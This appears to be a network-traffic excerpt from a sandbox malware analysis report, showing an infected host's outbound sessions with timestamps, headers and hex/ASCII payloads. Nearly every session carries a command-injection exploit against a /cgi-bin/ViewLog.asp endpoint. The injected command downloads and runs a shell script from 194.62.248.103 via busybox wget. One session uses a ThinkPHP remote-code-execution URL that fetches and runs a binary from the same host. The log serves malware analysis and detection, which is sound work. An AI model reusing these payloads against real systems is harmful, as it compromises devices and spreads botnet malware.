                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        847192.168.2.235683831.129.101.948080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.290263891 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        848192.168.2.234673231.136.165.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.557221889 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:07.507916927 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:09.395639896 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:13.395081997 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.074055910 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:36.175875902 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:07.403942108 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        849192.168.2.2343950112.46.224.10880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.593822002 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:37:10.835489988 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        850192.168.2.234978662.29.5.1928080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.620574951 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        851192.168.2.235745294.253.103.2048080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:06.642002106 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        852192.168.2.234370285.122.205.138080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.260144949 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        853192.168.2.235578662.210.101.978080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.261508942 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:07.560818911 CEST207INHTTP/1.1 404 Not Found
                                                        Content-Type: text/plain; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        Date: Sun, 14 Apr 2024 14:37:07 GMT
                                                        Content-Length: 19
                                                        Connection: close
                                                        Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                                        Data Ascii: 404 page not found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        854192.168.2.234469662.27.111.188080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.272871971 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        855192.168.2.234983831.136.253.1108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.275341034 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.244062901 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:10.163530111 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:14.162975073 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:21.841881990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:37.199801922 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:09.451459885 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        856192.168.2.235936895.112.12.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.281558990 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:07.601991892 CEST672INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:10 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 362
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        857192.168.2.234922494.121.154.2498080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.338193893 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        858192.168.2.235233695.86.99.458080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.348773956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        859192.168.2.235750494.253.103.2048080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.617389917 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        860192.168.2.234588485.175.96.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:07.621799946 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:07.984294891 CEST548INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:37:07 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
